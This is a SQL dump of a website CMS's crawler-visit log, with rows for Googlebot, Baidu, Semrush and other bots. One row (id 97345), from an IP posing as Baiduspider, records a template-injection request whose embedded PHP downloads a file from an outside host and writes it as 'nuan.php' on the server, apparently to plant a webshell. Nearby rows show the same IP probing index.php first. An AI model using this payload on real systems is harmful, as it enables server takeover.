INSERT INTO `ey_weapp_spider_visit` VALUES ('97678', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.112', '1661840685', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97677', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1661840383', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97676', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/197.html', '185.191.171.10', '1661840339', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97672', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_57/', '114.119.151.155', '1661839626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97767', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/80.html', '66.249.79.110', '1661888132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97809', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.108', '1661895955', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97810', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661896495', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97601', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/358.html', '114.119.151.155', '1661809254', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97668', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/230.html', '216.244.66.194', '1661838232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98423', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/59.html', '162.55.86.60', '1662194808', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97675', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/20.html', '66.249.79.110', '1661840141', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97674', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/232.html', '49.7.20.120', '1661840097', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98421', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/56.html', '162.55.86.60', '1662194745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97626', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/124.html', '220.181.108.103', '1661820367', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97814', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.112', '1661897359', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97698', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/387.html', '185.191.171.18', '1661855767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97685', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/5_4.html', '185.191.171.34', '1661845348', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97808', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.112', '1661895939', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97625', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/229.html', '66.249.79.108', '1661820054', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97635', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/133.html', '185.191.171.20', '1661826569', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97652', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/405.html', '114.119.151.155', '1661835168', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97637', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/356.html', '216.244.66.194', '1661827893', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97695', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661854463', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97693', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/20_3.html', '185.191.171.9', '1661852905', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97692', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/205.html', '216.244.66.194', '1661851898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97636', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/386.html', '185.191.171.43', '1661827505', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97805', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.110', '1661895437', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97708', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zss.html', '114.119.151.155', '1661862847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97716', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2.html', '185.191.171.23', '1661866443', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97638', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/230.html', '66.249.79.108', '1661829267', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97804', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/267.html', '66.249.79.110', '1661895242', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97803', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.108', '1661895026', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97758', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1661886865', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97774', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/186.html', '66.249.79.112', '1661890157', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97656', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_3/', '114.119.151.155', '1661835741', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97760', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/74.html', '66.249.79.108', '1661887056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97882', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.112', '1661929001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97651', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/133.html', '116.179.32.44', '1661834909', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98144', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/deyang.html', '114.119.151.155', '1662062605', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97530', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_22.html', '185.191.171.43', '1661777719', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97762', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/', '66.249.79.110', '1661887182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97759', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/72.html', '220.181.108.149', '1661886923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98146', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/421.html', '114.119.151.153', '1662064958', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98456', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/298.html', '162.55.86.60', '1662195807', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97722', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_16.html', '185.191.171.6', '1661867709', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97721', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_24/', '185.191.171.13', '1661867632', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98476', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/469.html', '162.55.86.60', '1662196368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97756', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/?lailu=www.zztly.cn', '185.191.171.11', '1661886796', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98550', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/beijing.html', '114.119.151.153', '1662213066', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97946', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/58.html', '185.191.171.4', '1661958196', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97957', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.110', '1661962713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98551', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/111.html', '114.119.151.155', '1662213180', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98038', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/102.html', '114.119.151.155', '1662011311', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98555', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/73.html', '116.179.32.143', '1662214832', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98101', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/200.html', '114.119.151.155', '1662041944', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98194', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/buliaojial/', '114.119.151.155', '1662079152', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97448', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qqhe.html', '114.119.151.155', '1661735277', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97449', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/229.html', '216.244.66.194', '1661735683', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98557', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/nantongshi.html', '220.181.108.102', '1662216236', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97435', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31.html?tagid=31', '185.191.171.40', '1661729365', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98207', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/guangxizhuangzu.html', '114.119.151.153', '1662086664', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98205', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.132', '1662086362', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98560', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1662218316', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97434', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661728608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97431', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/470.html', '185.191.171.17', '1661728224', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98217', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/286.html', '185.191.171.41', '1662093517', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98562', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/nantongshi.html', '116.179.32.19', '1662219039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98564', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.110', '1662219649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98593', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/258.html', '114.119.151.155', '1662242989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98602', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/73.html', '66.249.79.112', '1662245479', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97406', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/378.html', '114.119.151.155', '1661709375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97379', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661701600', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98617', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/178.html', '66.249.79.112', '1662253116', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97407', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/20_3.html', '66.249.79.112', '1661709703', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97409', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/182.html', '116.179.32.227', '1661709875', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97366', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/333.html', '185.191.171.24', '1661694686', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97367', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_4.html', '185.191.171.6', '1661696587', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98626', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1662255016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98631', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/191.html', '185.191.171.19', '1662257985', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98635', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/20.html', '114.119.151.153', '1662260870', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98643', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/144.html', '116.179.32.151', '1662265520', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98642', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/173.html', '66.249.79.108', '1662264725', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98619', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1662254124', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98622', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/56.html', '116.179.32.21', '1662254475', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98627', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '23.231.76.242', '1662255432', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98652', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/297.html', '216.244.66.194', '1662268896', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97360', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/198.html', '185.191.171.1', '1661691799', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97361', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.110', '1661691883', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98623', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/258.html', '17.121.114.26', '1662254635', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97359', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/282.html', '216.244.66.194', '1661690532', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97362', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_66/', '185.191.171.24', '1661692546', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97363', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/145.html', '185.191.171.15', '1661693877', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97356', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/139.html', '216.244.66.194', '1661687319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97364', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/150.html', '66.249.79.110', '1661694155', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97357', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661689149', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97358', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/13.html', '220.181.108.101', '1661690238', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97355', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/20.html', '66.249.79.110', '1661686277', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97365', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_4.html', '185.191.171.1', '1661694666', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97368', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/188.html', '220.181.108.157', '1661696783', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98624', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/345.html', '66.249.79.108', '1662254737', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97345', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//?a=fetch&templateFile=public/index&prefix=\'\'&content=<php>file_put_contents(\'nuan.php\',file_get_contents(\'https://i51baofu.xyz/upload/data.txt\'));</php>', '209.141.57.123', '1661682523', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97346', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.129.233.106', '1661682931', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97340', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products', '66.249.79.108', '1661681501', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97341', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '209.141.57.123', '1661682498', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97342', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//index.php', '209.141.57.123', '1661682499', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97343', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//index.php?m=vod-search', '209.141.57.123', '1661682518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97344', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//index.php', '209.141.57.123', '1661682521', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98629', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1662256804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98632', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73.html', '185.191.171.11', '1662259752', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97338', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '110.88.127.208', '1661680011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97339', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_18/', '220.181.108.94', '1661680420', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97347', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/68.html', '220.181.108.175', '1661683693', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97337', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/154.html', '185.191.171.18', '1661679785', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97336', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/?lailu=www.zztly.cn', '185.191.171.38', '1661678438', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98657', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/rzs.html', '114.119.151.153', '1662271645', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97381', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/changjianwenda', '116.179.32.106', '1661703331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97387', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/225.html', '66.249.79.108', '1661705667', '0');
